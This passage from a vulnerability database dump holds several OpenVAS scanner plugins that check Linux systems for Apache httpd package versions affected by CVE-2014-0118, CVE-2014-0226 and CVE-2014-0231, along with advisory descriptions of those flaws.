in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226\nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231\nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang indefinitely, leading to denial\nof service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-13+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120103", "title": "Amazon Linux Local Check: ALAS-2014-388", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-388.nasl 6759 2017-07-19 09:56:33Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120103\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:29 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-388\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Apache HTTP server. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-388.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.27~1.3.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.27~1.3.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.27~1.3.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.27~1.3.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.27~1.3.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:32", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-0920", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123366", "title": "Oracle Linux Local Check: ELSA-2014-0920", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0920.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123366\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:02:50 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0920\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0920 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0920\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0920.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:22", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310881972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881972", "title": "CentOS Update for httpd CESA-2014:0920 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2014:0920 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881972\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:34:43 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for httpd CESA-2014:0920 centos5\");\n\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0920\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310871203", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871203", "title": "RedHat Update for httpd RHSA-2014:0920-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2014:0920-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871203\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:42:09 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for httpd RHSA-2014:0920-01\");\n\n\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0920-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-July/msg00046.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:34", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120104", "title": "Amazon Linux Local Check: ALAS-2014-389", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-389.nasl 6715 2017-07-13 09:57:40Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120104\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:31 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-389\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Apache HTTP server. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd24 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-389.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"mod24_proxy_html\", rpm:\"mod24_proxy_html~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd24\", rpm:\"httpd24~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd24-debuginfo\", rpm:\"httpd24-debuginfo~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"mod24_ldap\", rpm:\"mod24_ldap~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd24-tools\", rpm:\"httpd24-tools~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"mod24_ssl\", rpm:\"mod24_ssl~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd24-devel\", rpm:\"httpd24-devel~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd24-manual\", rpm:\"httpd24-manual~2.4.10~1.59.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:36", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310841915", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841915", "title": "Ubuntu Update for apache2 USN-2299-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2299_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for apache2 USN-2299-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841915\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:41:33 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0117\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n 